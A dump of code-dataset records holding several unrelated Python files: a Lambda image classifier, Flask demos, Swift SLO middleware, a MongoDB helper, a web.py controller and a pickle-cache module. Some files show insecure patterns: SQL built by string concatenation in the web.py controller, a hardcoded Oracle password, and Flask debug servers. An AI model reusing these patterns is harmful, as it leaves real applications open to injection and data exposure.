+{"seq_id":"126180599","text":"try:\n    import unzip_requirements\nexcept ImportError:\n    pass\nimport io\nimport os\nimport time\n\nimport boto3\nimport requests\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\n\ns3_resource = boto3.resource('s3')\n\nimg_transforms = transforms.Compose([\n    transforms.Resize(256),\n    transforms.CenterCrop(224),\n    transforms.ToTensor(),\n    transforms.Normalize([0.485, 0.456, 0.406],\n                         [0.229, 0.224, 0.225])\n])\n\n\ndef download_image(url):\n    try:\n        r = requests.get(url)\n        if r.status_code == 200:\n            f = io.BytesIO(r.content)\n            img = Image.open(f)\n            return img\n        else:\n            return None\n    except Exception:\n        return None\n\n\ndef download_model(bucket='', key=''):\n    location = f'/tmp/{os.path.basename(key)}'\n    if not os.path.exists(location):\n        s3_resource.Object(bucket, key).download_file(location)\n    return location\n\n\ndef classify_image(model_path, img):\n    model = torch.jit.load(model_path)\n    img = img_transforms(img).unsqueeze(0)\n    cl = model(img).argmax().item()\n    return cl\n\n\ndef lambda_handler(event, context):\n    # download model\n    model_path = download_model(\n        bucket='segmentsai-dl', key='models/pytorch_model.pt')\n    # download image\n    img = download_image(event['url'])\n    # classify image\n    if img:\n        cl = classify_image(model_path, img)\n        return {\n            'statusCode': 200,\n            'class': cl\n        }\n    else:\n        return {\n            'statusCode': 404,\n            'class': None\n        }","sub_path":"aws_lambda/.ipynb_checkpoints/main-checkpoint.py","file_name":"main-checkpoint.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
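A quick local check of the preprocessing pipeline from the Lambda record above, run on a synthetic image so that no network or S3 access is needed; only Pillow and torchvision are assumed to be installed:

from PIL import Image
from torchvision import transforms

tfm = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406],
                         [0.229, 0.224, 0.225]),
])
img = Image.new('RGB', (640, 480))   # synthetic stand-in image
batch = tfm(img).unsqueeze(0)        # add the batch dimension
assert tuple(batch.shape) == (1, 3, 224, 224)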
+{"seq_id":"288789948","text":"from flask.app import Flask\r\nfrom flask_sqlalchemy import SQLAlchemy\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI']='oracle://vineethkuttan:hero@localhost:1521/XE'\r\ndb=SQLAlchemy(app)\r\nclass User(db.Model):\r\n    __tablename__=\"tbl_user\"\r\n    id=db.Column(db.Integer,primary_key=True)\r\n    name=db.Column(db.String(20))\r\n    address=db.Column(db.String(20))\r\n@app.route('/home/<id>/<name>/<address>')\r\ndef index(id,name,address):\r\n    user=User(id=id,name=name,address=address)\r\n    db.session.add(user)\r\n    db.session.commit()\r\n    return f\"Added new USER {id} {name} {address}
    \"\r\nif __name__==\"__main__\":\r\n db.create_all()\r\n app.run(port=8090,debug=True)\r\n","sub_path":"PYTHON/flaskandsqlalchemy/example/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"588316353","text":"from flask import Flask \nfrom flask import request \nfrom flask import Response \n\nimport os \n\napp = Flask(__name__)\n\nos.environ['LOG_FILE_PATH'] = \"log/analytics.json\"\n\nLOG_FILE_PATH = os.environ['LOG_FILE_PATH']\n\nprint(LOG_FILE_PATH)\n\n\n#GET DIRECTORY OF FILEPATH (IN OS LIBRARY\ndirectory = os.path.dirname(LOG_FILE_PATH)\nos.makedirs(directory, exist_ok = True) #if directory does not exist make one\n\t\n\t\t\n@app.route('/', methods = ['GET','POST'])\ndef Log():\n\tif request.method == 'POST':\n\t\tdata = request.get_json(force = True)\n\n\t\twith open(LOG_FILE_PATH, 'a') as file:\n\t\t\tfile.write(str(data)) \n\t\t\n\t\treturn Response()\n\n\n\telif request.method == 'GET':\n\t\treturn Response()\n\n\t\t\n\n#this allows us to run our app\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=8000, debug=True)\n\n\n\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"54236028","text":"# Copyright (c) 2013 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nMiddleware that will provide Static Large Object (SLO) support.\n\nThis feature is very similar to Dynamic Large Object (DLO) support in that\nit allows the user to upload many objects concurrently and afterwards\ndownload them as a single object. It is different in that it does not rely\non eventually consistent container listings to do so. Instead, a user\ndefined manifest of the object segments is used.\n\n----------------------\nUploading the Manifest\n----------------------\n\nAfter the user has uploaded the objects to be concatenated a manifest is\nuploaded. The request must be a PUT with the query parameter::\n\n ?multipart-manifest=put\n\nThe body of this request will be an ordered list of files in\njson data format. The data to be supplied for each segment is::\n\n path: the path to the segment (not including account)\n /container/object_name\n etag: the etag given back when the segment was PUT\n size_bytes: the size of the segment in bytes\n\nThe format of the list will be::\n\n json:\n [{\"path\": \"/cont/object\",\n \"etag\": \"etagoftheobjectsegment\",\n \"size_bytes\": 1048576}, ...]\n\nThe number of object segments is limited to a configurable amount, default\n1000. Each segment, except for the final one, must be at least 1 megabyte\n(configurable). On upload, the middleware will head every segment passed in and\nverify the size and etag of each. If any of the objects do not match (not\nfound, size/etag mismatch, below minimum size) then the user will receive a 4xx\nerror response. 
If everything does match, the user will receive a 2xx response\nand the SLO object is ready for downloading.\n\nBehind the scenes, on success, a json manifest generated from the user input is\nsent to object servers with an extra \"X-Static-Large-Object: True\" header\nand a modified Content-Type. The parameter: swift_bytes=$total_size will be\nappended to the existing Content-Type, where total_size is the sum of all\nthe included segments' size_bytes. This extra parameter will be hidden from\nthe user.\n\nManifest files can reference objects in separate containers, which will improve\nconcurrent upload speed. Objects can be referenced by multiple manifests. The\nsegments of a SLO manifest can even be other SLO manifests. Treat them as any\nother object i.e., use the Etag and Content-Length given on the PUT of the\nsub-SLO in the manifest to the parent SLO.\n\n-------------------------\nRetrieving a Large Object\n-------------------------\n\nA GET request to the manifest object will return the concatenation of the\nobjects from the manifest much like DLO. If any of the segments from the\nmanifest are not found or their Etag/Content Length no longer match the\nconnection will drop. In this case a 409 Conflict will be logged in the proxy\nlogs and the user will receive incomplete results.\n\nThe headers from this GET or HEAD request will return the metadata attached\nto the manifest object itself with some exceptions::\n\n Content-Length: the total size of the SLO (the sum of the sizes of\n the segments in the manifest)\n X-Static-Large-Object: True\n Etag: the etag of the SLO (generated the same way as DLO)\n\nA GET request with the query parameter::\n\n ?multipart-manifest=get\n\nWill return the actual manifest file itself. This is generated json and does\nnot match the data sent from the original multipart-manifest=put. This call's\nmain purpose is for debugging.\n\nWhen the manifest object is uploaded you are more or less guaranteed that\nevery segment in the manifest exists and matched the specifications.\nHowever, there is nothing that prevents the user from breaking the\nSLO download by deleting/replacing a segment referenced in the manifest. It is\nleft to the user use caution in handling the segments.\n\n-----------------------\nDeleting a Large Object\n-----------------------\n\nA DELETE request will just delete the manifest object itself.\n\nA DELETE with a query parameter::\n\n ?multipart-manifest=delete\n\nwill delete all the segments referenced in the manifest and then the manifest\nitself. The failure response will be similar to the bulk delete middleware.\n\n------------------------\nModifying a Large Object\n------------------------\n\nPUTs / POSTs will work as expected, PUTs will just overwrite the manifest\nobject for example.\n\n------------------\nContainer Listings\n------------------\n\nIn a container listing the size listed for SLO manifest objects will be the\ntotal_size of the concatenated segments in the manifest. The overall\nX-Container-Bytes-Used for the container (and subsequently for the account)\nwill not reflect total_size of the manifest but the actual size of the json\ndata stored. The reason for this somewhat confusing discrepancy is we want the\ncontainer listing to reflect the size of the manifest object when it is\ndownloaded. 
We do not, however, want to count the bytes-used twice (for both\nthe manifest and the segments it's referring to) in the container and account\nmetadata which can be used for stats purposes.\n\"\"\"\n\nfrom urllib import quote\nfrom cStringIO import StringIO\nfrom datetime import datetime\nimport mimetypes\nfrom hashlib import md5\nfrom swift.common.swob import Request, HTTPBadRequest, HTTPServerError, \\\n HTTPMethodNotAllowed, HTTPRequestEntityTooLarge, HTTPLengthRequired, \\\n HTTPOk, HTTPPreconditionFailed, HTTPException, HTTPNotFound, \\\n HTTPUnauthorized\nfrom swift.common.utils import (json, get_logger, config_true_value,\n register_swift_info)\nfrom swift.common.constraints import check_utf8, MAX_BUFFERED_SLO_SEGMENTS\nfrom swift.common.http import HTTP_NOT_FOUND, HTTP_UNAUTHORIZED\nfrom swift.common.wsgi import WSGIContext\nfrom swift.common.middleware.bulk import get_response_body, \\\n ACCEPTABLE_FORMATS, Bulk\n\n\ndef parse_input(raw_data):\n \"\"\"\n Given a request will parse the body and return a list of dictionaries\n :raises: HTTPException on parse errors\n :returns: a list of dictionaries on success\n \"\"\"\n try:\n parsed_data = json.loads(raw_data)\n except ValueError:\n raise HTTPBadRequest(\"Manifest must be valid json.\")\n\n req_keys = set(['path', 'etag', 'size_bytes'])\n try:\n for seg_dict in parsed_data:\n if (set(seg_dict) != req_keys or\n '/' not in seg_dict['path'].lstrip('/')):\n raise HTTPBadRequest('Invalid SLO Manifest File')\n except (AttributeError, TypeError):\n raise HTTPBadRequest('Invalid SLO Manifest File')\n\n return parsed_data\n\n\nclass SloContext(WSGIContext):\n\n def __init__(self, slo, slo_etag):\n WSGIContext.__init__(self, slo.app)\n self.slo_etag = '\"' + slo_etag.hexdigest() + '\"'\n\n def handle_slo_put(self, req, start_response):\n app_resp = self._app_call(req.environ)\n\n for i in xrange(len(self._response_headers)):\n if self._response_headers[i][0].lower() == 'etag':\n self._response_headers[i] = ('Etag', self.slo_etag)\n break\n\n start_response(self._response_status,\n self._response_headers,\n self._response_exc_info)\n return app_resp\n\n\nclass StaticLargeObject(object):\n \"\"\"\n StaticLargeObject Middleware\n\n See above for a full description.\n\n The proxy logs created for any subrequests made will have swift.source set\n to \"SLO\".\n\n :param app: The next WSGI filter or app in the paste.deploy chain.\n :param conf: The configuration dict for the middleware.\n \"\"\"\n\n def __init__(self, app, conf):\n self.conf = conf\n self.app = app\n self.logger = get_logger(conf, log_route='slo')\n self.max_manifest_segments = int(self.conf.get('max_manifest_segments',\n 1000))\n self.max_manifest_size = int(self.conf.get('max_manifest_size',\n 1024 * 1024 * 2))\n self.min_segment_size = int(self.conf.get('min_segment_size',\n 1024 * 1024))\n self.bulk_deleter = Bulk(app, {})\n\n def handle_multipart_put(self, req, start_response):\n \"\"\"\n Will handle the PUT of a SLO manifest.\n Heads every object in manifest to check if is valid and if so will\n save a manifest generated from the user input. 
Uses WSGIContext to\n call self.app and start_response and returns a WSGI iterator.\n\n :params req: a swob.Request with an obj in path\n :raises: HttpException on errors\n \"\"\"\n try:\n vrs, account, container, obj = req.split_path(1, 4, True)\n except ValueError:\n return self.app(req.environ, start_response)\n if req.content_length > self.max_manifest_size:\n raise HTTPRequestEntityTooLarge(\n \"Manifest File > %d bytes\" % self.max_manifest_size)\n if req.headers.get('X-Copy-From'):\n raise HTTPMethodNotAllowed(\n 'Multipart Manifest PUTs cannot be Copy requests')\n if req.content_length is None and \\\n req.headers.get('transfer-encoding', '').lower() != 'chunked':\n raise HTTPLengthRequired(request=req)\n parsed_data = parse_input(req.body_file.read(self.max_manifest_size))\n problem_segments = []\n\n if len(parsed_data) > self.max_manifest_segments:\n raise HTTPRequestEntityTooLarge(\n 'Number segments must be <= %d' % self.max_manifest_segments)\n total_size = 0\n out_content_type = req.accept.best_match(ACCEPTABLE_FORMATS)\n if not out_content_type:\n out_content_type = 'text/plain'\n data_for_storage = []\n slo_etag = md5()\n for index, seg_dict in enumerate(parsed_data):\n obj_name = seg_dict['path']\n if isinstance(obj_name, unicode):\n obj_name = obj_name.encode('utf-8')\n obj_path = '/'.join(['', vrs, account, obj_name.lstrip('/')])\n try:\n seg_size = int(seg_dict['size_bytes'])\n except (ValueError, TypeError):\n raise HTTPBadRequest('Invalid Manifest File')\n if seg_size < self.min_segment_size and \\\n (index == 0 or index < len(parsed_data) - 1):\n raise HTTPBadRequest(\n 'Each segment, except the last, must be larger than '\n '%d bytes.' % self.min_segment_size)\n\n new_env = req.environ.copy()\n new_env['PATH_INFO'] = obj_path\n new_env['REQUEST_METHOD'] = 'HEAD'\n new_env['swift.source'] = 'SLO'\n del(new_env['wsgi.input'])\n del(new_env['QUERY_STRING'])\n new_env['CONTENT_LENGTH'] = 0\n new_env['HTTP_USER_AGENT'] = \\\n '%s MultipartPUT' % req.environ.get('HTTP_USER_AGENT')\n head_seg_resp = \\\n Request.blank(obj_path, new_env).get_response(self.app)\n if head_seg_resp.is_success:\n total_size += seg_size\n if seg_size != head_seg_resp.content_length:\n problem_segments.append([quote(obj_name), 'Size Mismatch'])\n if seg_dict['etag'] == head_seg_resp.etag:\n slo_etag.update(seg_dict['etag'])\n else:\n problem_segments.append([quote(obj_name), 'Etag Mismatch'])\n if head_seg_resp.last_modified:\n last_modified = head_seg_resp.last_modified\n else:\n # shouldn't happen\n last_modified = datetime.now()\n\n last_modified_formatted = \\\n last_modified.strftime('%Y-%m-%dT%H:%M:%S.%f')\n seg_data = {'name': '/' + seg_dict['path'].lstrip('/'),\n 'bytes': seg_size,\n 'hash': seg_dict['etag'],\n 'content_type': head_seg_resp.content_type,\n 'last_modified': last_modified_formatted}\n if config_true_value(\n head_seg_resp.headers.get('X-Static-Large-Object')):\n seg_data['sub_slo'] = True\n data_for_storage.append(seg_data)\n\n else:\n problem_segments.append([quote(obj_name),\n head_seg_resp.status])\n if problem_segments:\n resp_body = get_response_body(\n out_content_type, {}, problem_segments)\n raise HTTPBadRequest(resp_body, content_type=out_content_type)\n env = req.environ\n\n if not env.get('CONTENT_TYPE'):\n guessed_type, _junk = mimetypes.guess_type(req.path_info)\n env['CONTENT_TYPE'] = guessed_type or 'application/octet-stream'\n env['swift.content_type_overriden'] = True\n env['CONTENT_TYPE'] += \";swift_bytes=%d\" % total_size\n 
env['HTTP_X_STATIC_LARGE_OBJECT'] = 'True'\n json_data = json.dumps(data_for_storage)\n env['CONTENT_LENGTH'] = str(len(json_data))\n env['wsgi.input'] = StringIO(json_data)\n\n slo_context = SloContext(self, slo_etag)\n return slo_context.handle_slo_put(req, start_response)\n\n def get_segments_to_delete_iter(self, req):\n \"\"\"\n A generator function to be used to delete all the segments and\n sub-segments referenced in a manifest.\n\n :params req: a swob.Request with an SLO manifest in path\n :raises HTTPPreconditionFailed: on invalid UTF8 in request path\n :raises HTTPBadRequest: on too many buffered sub segments and\n on invalid SLO manifest path\n \"\"\"\n if not check_utf8(req.path_info):\n raise HTTPPreconditionFailed(\n request=req, body='Invalid UTF8 or contains NULL')\n try:\n vrs, account, container, obj = req.split_path(4, 4, True)\n except ValueError:\n raise HTTPBadRequest('Invalid SLO manifiest path')\n\n segments = [{\n 'sub_slo': True,\n 'name': ('/%s/%s' % (container, obj)).decode('utf-8')}]\n while segments:\n if len(segments) > MAX_BUFFERED_SLO_SEGMENTS:\n raise HTTPBadRequest(\n 'Too many buffered slo segments to delete.')\n seg_data = segments.pop(0)\n if seg_data.get('sub_slo'):\n try:\n segments.extend(\n self.get_slo_segments(seg_data['name'], req))\n except HTTPException as err:\n # allow bulk delete response to report errors\n seg_data['error'] = {'code': err.status_int,\n 'message': err.body}\n\n # add manifest back to be deleted after segments\n seg_data['sub_slo'] = False\n segments.append(seg_data)\n else:\n seg_data['name'] = seg_data['name'].encode('utf-8')\n yield seg_data\n\n def get_slo_segments(self, obj_name, req):\n \"\"\"\n Performs a swob.Request and returns the SLO manifest's segments.\n\n :raises HTTPServerError: on unable to load obj_name or\n on unable to load the SLO manifest data.\n :raises HTTPBadRequest: on not an SLO manifest\n :raises HTTPNotFound: on SLO manifest not found\n :returns: SLO manifest's segments\n \"\"\"\n vrs, account, _junk = req.split_path(2, 3, True)\n new_env = req.environ.copy()\n new_env['REQUEST_METHOD'] = 'GET'\n del(new_env['wsgi.input'])\n new_env['QUERY_STRING'] = 'multipart-manifest=get'\n new_env['CONTENT_LENGTH'] = 0\n new_env['HTTP_USER_AGENT'] = \\\n '%s MultipartDELETE' % new_env.get('HTTP_USER_AGENT')\n new_env['swift.source'] = 'SLO'\n new_env['PATH_INFO'] = (\n '/%s/%s/%s' % (\n vrs, account,\n obj_name.lstrip('/'))).encode('utf-8')\n resp = Request.blank('', new_env).get_response(self.app)\n\n if resp.is_success:\n if config_true_value(resp.headers.get('X-Static-Large-Object')):\n try:\n return json.loads(resp.body)\n except ValueError:\n raise HTTPServerError('Unable to load SLO manifest')\n else:\n raise HTTPBadRequest('Not an SLO manifest')\n elif resp.status_int == HTTP_NOT_FOUND:\n raise HTTPNotFound('SLO manifest not found')\n elif resp.status_int == HTTP_UNAUTHORIZED:\n raise HTTPUnauthorized('401 Unauthorized')\n else:\n raise HTTPServerError('Unable to load SLO manifest or segment.')\n\n def handle_multipart_delete(self, req):\n \"\"\"\n Will delete all the segments in the SLO manifest and then, if\n successful, will delete the manifest file.\n\n :params req: a swob.Request with an obj in path\n :returns: swob.Response whose app_iter set to Bulk.handle_delete_iter\n \"\"\"\n resp = HTTPOk(request=req)\n out_content_type = req.accept.best_match(ACCEPTABLE_FORMATS)\n if out_content_type:\n resp.content_type = out_content_type\n resp.app_iter = self.bulk_deleter.handle_delete_iter(\n req, 
objs_to_delete=self.get_segments_to_delete_iter(req),\n            user_agent='MultipartDELETE', swift_source='SLO',\n            out_content_type=out_content_type)\n        return resp\n\n    def __call__(self, env, start_response):\n        \"\"\"\n        WSGI entry point\n        \"\"\"\n        req = Request(env)\n        try:\n            vrs, account, container, obj = req.split_path(1, 4, True)\n        except ValueError:\n            return self.app(env, start_response)\n        try:\n            if obj:\n                if req.method == 'PUT' and \\\n                        req.params.get('multipart-manifest') == 'put':\n                    return self.handle_multipart_put(req, start_response)\n                if req.method == 'DELETE' and \\\n                        req.params.get('multipart-manifest') == 'delete':\n                    return self.handle_multipart_delete(req)(env,\n                                                             start_response)\n                if 'X-Static-Large-Object' in req.headers:\n                    raise HTTPBadRequest(\n                        request=req,\n                        body='X-Static-Large-Object is a reserved header. '\n                        'To create a static large object add query param '\n                        'multipart-manifest=put.')\n        except HTTPException as err_resp:\n            return err_resp(env, start_response)\n\n        return self.app(env, start_response)\n\n\ndef filter_factory(global_conf, **local_conf):\n    conf = global_conf.copy()\n    conf.update(local_conf)\n    register_swift_info('slo')\n\n    def slo_filter(app):\n        return StaticLargeObject(app, conf)\n    return slo_filter\n","sub_path":"swift/source/swift/swift/common/middleware/slo.py","file_name":"slo.py","file_ext":"py","file_size_in_byte":19547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"111075874","text":"from my_service import connect_db\n\ndef checkRegis(user):\n    checkduplicate = False\n    db = connect_db.connectMongoDB()\n    if db.userlist.count_documents({'username': user }) != 0:\n        checkduplicate = True\n        print(\"Username is Same\")\n    else:\n        print(\"Username Not Same\")\n    return (checkduplicate)\n\ndef insertRegister_to_Db(datainput):\n    status = False\n    db = connect_db.connectMongoDB()\n    result = db.userlist.insert_one(datainput)\n    if result.inserted_id != \"\":\n        status = True\n    return (status)\n\ndef check_inputNormal(input):\n    print(\"Check null value ==> wait...\")\n    status = False\n    for key,i in enumerate(input): #If have null value ==> False\n        if i != \"\":\n            print(\"Check null value in Index [{}] ==> ok\".format(key))\n            status = True\n        else:\n            status = False\n            print(\"==> Found null value!\")\n            break\n    return (status)","sub_path":"my_service/check_register.py","file_name":"check_register.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
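The count-then-insert pattern in checkRegis() above can race when two registrations arrive concurrently; a hedged alternative (connection details are placeholders) is to let MongoDB enforce uniqueness with an index:

from pymongo import MongoClient, errors

db = MongoClient('localhost', 27017)['mydb']       # placeholder connection
db.userlist.create_index('username', unique=True)
try:
    db.userlist.insert_one({'username': 'alice'})
except errors.DuplicateKeyError:
    print('Username is Same')                      # duplicate rejected atomically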
datos;\"\n","sub_path":"controllers/cntrpal.py","file_name":"cntrpal.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"131762011","text":"\"\"\"PickleCache.py\n\nPickleCache provides tools for keeping fast-loading cached versions of\nfiles so that subsequent loads are faster. This is similar to how Python\nsilently caches .pyc files next to .py files.\n\nThe typical scenario is that you have a type of text file that gets\n\"translated\" to Pythonic data (dictionaries, tuples, instances, ints,\netc.). By caching the Python data on disk in pickle format, you can\navoid the expensive translation on subsequent reads of the file.\n\nTwo real life cases are MiscUtils.DataTable, which loads and represents\ncomma-separated files, and the separate MiddleKit plug-in which has an\nobject model file. So for examples on using this module, load up the\nfollowing files and search for \"Pickle\"::\n\n MiscUtils/DataTable.py\n MiddleKit/Core/Model.py\n\nThe cached file is named the same as the original file with\n'.pickle.cache' suffixed. The utility of '.pickle' is to denote the file\nformat and the utility of '.cache' is to provide ``*.cache`` as a simple\npattern that can be removed, ignored by backup scripts, etc.\n\nThe treatment of the cached file is silent and friendly just like\nPython's approach to .pyc files. If it cannot be read or written for\nvarious reasons (cache is out of date, permissions are bad, wrong python\nversion, etc.), then it will be silently ignored.\n\nGRANULARITY\n\nIn constructing the test suite, I discovered that if the source file is\nnewly written less than 1 second after the cached file, then the fact\nthat the source file is newer will not be detected and the cache will\nstill be used. I believe this is a limitation of the granularity of\nos.path.getmtime(). If anyone knows of a more granular solution, please\nlet me know.\n\nThis would only be a problem in programmatic situations where the source\nfile was rapidly being written and read. I think that's fairly rare.\n\nSEE ALSO\n https://docs.python.org/3/library/pickle.html\n\"\"\"\n\nimport os\nimport sys\nfrom time import sleep\nfrom pprint import pprint\ntry:\n from pickle import load, dump, HIGHEST_PROTOCOL as maxPickleProtocol\nexcept ImportError:\n from pickle import load, dump, HIGHEST_PROTOCOL as maxPickleProtocol\n\nverbose = False\n\n# force version_info into a simple tuple\nversionInfo = tuple(sys.version_info)\n\n\nclass PickleCache:\n \"\"\"Abstract base class for PickleCacheReader and PickleCacheWriter.\"\"\"\n\n _verbose = verbose\n\n def picklePath(self, filename):\n return filename + '.pickle.cache'\n\n\nclass PickleCacheReader(PickleCache):\n\n def read(self, filename,\n pickleProtocol=None, source=None, verbose=None):\n \"\"\"Read data from pickle cache.\n\n Returns the data from the pickle cache version of the filename,\n if it can read. 
+{"seq_id":"131762011","text":"\"\"\"PickleCache.py\n\nPickleCache provides tools for keeping fast-loading cached versions of\nfiles so that subsequent loads are faster. This is similar to how Python\nsilently caches .pyc files next to .py files.\n\nThe typical scenario is that you have a type of text file that gets\n\"translated\" to Pythonic data (dictionaries, tuples, instances, ints,\netc.). By caching the Python data on disk in pickle format, you can\navoid the expensive translation on subsequent reads of the file.\n\nTwo real life cases are MiscUtils.DataTable, which loads and represents\ncomma-separated files, and the separate MiddleKit plug-in which has an\nobject model file. So for examples on using this module, load up the\nfollowing files and search for \"Pickle\"::\n\n    MiscUtils/DataTable.py\n    MiddleKit/Core/Model.py\n\nThe cached file is named the same as the original file with\n'.pickle.cache' suffixed. The utility of '.pickle' is to denote the file\nformat and the utility of '.cache' is to provide ``*.cache`` as a simple\npattern that can be removed, ignored by backup scripts, etc.\n\nThe treatment of the cached file is silent and friendly just like\nPython's approach to .pyc files. If it cannot be read or written for\nvarious reasons (cache is out of date, permissions are bad, wrong python\nversion, etc.), then it will be silently ignored.\n\nGRANULARITY\n\nIn constructing the test suite, I discovered that if the source file is\nnewly written less than 1 second after the cached file, then the fact\nthat the source file is newer will not be detected and the cache will\nstill be used. I believe this is a limitation of the granularity of\nos.path.getmtime(). If anyone knows of a more granular solution, please\nlet me know.\n\nThis would only be a problem in programmatic situations where the source\nfile was rapidly being written and read. I think that's fairly rare.\n\nSEE ALSO\n    https://docs.python.org/3/library/pickle.html\n\"\"\"\n\nimport os\nimport sys\nfrom time import sleep\nfrom pprint import pprint\nfrom pickle import load, dump, HIGHEST_PROTOCOL as maxPickleProtocol\n\nverbose = False\n\n# force version_info into a simple tuple\nversionInfo = tuple(sys.version_info)\n\n\nclass PickleCache:\n    \"\"\"Abstract base class for PickleCacheReader and PickleCacheWriter.\"\"\"\n\n    _verbose = verbose\n\n    def picklePath(self, filename):\n        return filename + '.pickle.cache'\n\n\nclass PickleCacheReader(PickleCache):\n\n    def read(self, filename,\n             pickleProtocol=None, source=None, verbose=None):\n        \"\"\"Read data from pickle cache.\n\n        Returns the data from the pickle cache version of the filename,\n        if it can read. Otherwise returns None, which also indicates\n        that writePickleCache() should be subsequently called after\n        the original file is read.\n        \"\"\"\n        if pickleProtocol is None or pickleProtocol < 0:\n            pickleProtocol = maxPickleProtocol\n        if verbose is None:\n            v = self._verbose\n        else:\n            v = verbose\n        if v:\n            print('>> PickleCacheReader.read() - verbose is on')\n        if not filename:\n            raise ValueError('Missing filename')\n\n        if not os.path.exists(filename):\n            if v:\n                print(f'Cannot find {filename!r}.')\n            open(filename)  # to get a properly constructed IOError\n\n        shouldDeletePickle = False\n        data = None\n\n        picklePath = self.picklePath(filename)\n        if os.path.exists(picklePath):\n            if os.path.getmtime(picklePath) < os.path.getmtime(filename):\n                if v:\n                    print('Cache is out of date.')\n                shouldDeletePickle = True\n            else:\n                try:\n                    if v:\n                        print(f'About to open for read {picklePath!r}.')\n                    file = open(picklePath, 'rb')\n                except IOError as e:\n                    if v:\n                        print('Cannot open cache file:'\n                              f' {e.__class__.__name__}: {e}.')\n                else:\n                    try:\n                        if v:\n                            print('about to load')\n                        d = load(file)\n                    except EOFError:\n                        if v:\n                            print('EOFError - not loading')\n                        shouldDeletePickle = True\n                    except Exception as exc:\n                        print(f'WARNING: {self.__class__.__name__}:'\n                              f' {exc.__class__.__name__}: {exc}')\n                        shouldDeletePickle = True\n                    else:\n                        file.close()\n                        if v:\n                            print('Finished reading.')\n                        if not isinstance(d, dict):\n                            raise TypeError(f'Expected dict, but got: {d!r}')\n                        for key in ('source', 'data',\n                                    'pickle protocol', 'python version'):\n                            if key not in d:\n                                raise ValueError(f'{key} not found')\n                        if source and d['source'] != source:\n                            if v:\n                                print(f'Not from required source ({source}):'\n                                      f\" {d['source']}.\")\n                            shouldDeletePickle = True\n                        elif d['pickle protocol'] != pickleProtocol:\n                            if v:\n                                print('Pickle protocol'\n                                      f\" ({d['pickle protocol']})\"\n                                      ' does not match expected'\n                                      f' ({pickleProtocol}).')\n                            shouldDeletePickle = True\n                        elif d['python version'] != versionInfo:\n                            if v:\n                                print('Python version'\n                                      f\" {d['python version']}\"\n                                      ' does not match current'\n                                      f' {versionInfo}')\n                            shouldDeletePickle = True\n                        else:\n                            if v:\n                                print('All tests pass, accepting data.')\n                                if v > 1:\n                                    print('Display full dict:')\n                                    pprint(d)\n                            data = d['data']\n\n        # Delete the pickle file if suggested by previous conditions\n        if shouldDeletePickle:\n            try:\n                if v:\n                    print('Attempting to remove pickle cache file.')\n                os.remove(picklePath)\n            except OSError as exc:\n                if v:\n                    print(f'Failed to remove: {exc.__class__.__name__}: {exc}')\n\n        if v:\n            print('Done reading data.')\n            print()\n\n        return data
\n\n\nclass PickleCacheWriter(PickleCache):\n\n    _writeSleepInterval = 0.1\n\n    def write(self, data, filename,\n              pickleProtocol=None, source=None, verbose=None):\n        if pickleProtocol is None or pickleProtocol < 0:\n            pickleProtocol = maxPickleProtocol\n        if verbose is None:\n            v = self._verbose\n        else:\n            v = verbose\n        if v:\n            print('>> PickleCacheWriter.write() - verbose is on.')\n        if not filename:\n            raise ValueError('Missing filename')\n        sourceTimestamp = os.path.getmtime(filename)\n\n        picklePath = self.picklePath(filename)\n        d = {\n            'source': source,\n            'python version': versionInfo,\n            'pickle protocol': pickleProtocol,\n            'data': data,\n        }\n        if v > 1:\n            print('Display full dict:')\n            pprint(d)\n        try:\n            if v:\n                print(f'About to open for write {picklePath!r}.')\n            pickleFile = open(picklePath, 'wb')\n        except IOError as e:\n            if v:\n                print(f'error. not writing. {e.__class__.__name__}: {e}')\n        else:\n            while True:\n                dump(d, pickleFile, pickleProtocol)\n                pickleFile.close()\n                # Make sure the cache has a newer timestamp, otherwise the\n                # cache will just get ignored and rewritten next time.\n                if os.path.getmtime(picklePath) == sourceTimestamp:\n                    if v:\n                        print('Timestamps are identical, sleeping'\n                              f' {self._writeSleepInterval:.2f} seconds.')\n                    sleep(self._writeSleepInterval)\n                    pickleFile = open(picklePath, 'wb')\n                else:\n                    break\n\n        if v:\n            print('Done writing data.')\n            print()\n\n\n# Define module level convenience functions:\n_reader = PickleCacheReader()\nreadPickleCache = _reader.read\n_writer = PickleCacheWriter()\nwritePickleCache = _writer.write\n","sub_path":"webware/MiscUtils/PickleCache.py","file_name":"PickleCache.py","file_ext":"py","file_size_in_byte":9155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
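One small point from the PickleCache record above: the sleep message formats a float with an f-string, and f-string format specs use ':.2f' rather than printf's '%0.2f' (which raises ValueError as a format spec). A two-line check:

interval = 0.1
print(f'sleeping {interval:.2f} seconds')   # -> sleeping 0.10 seconds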
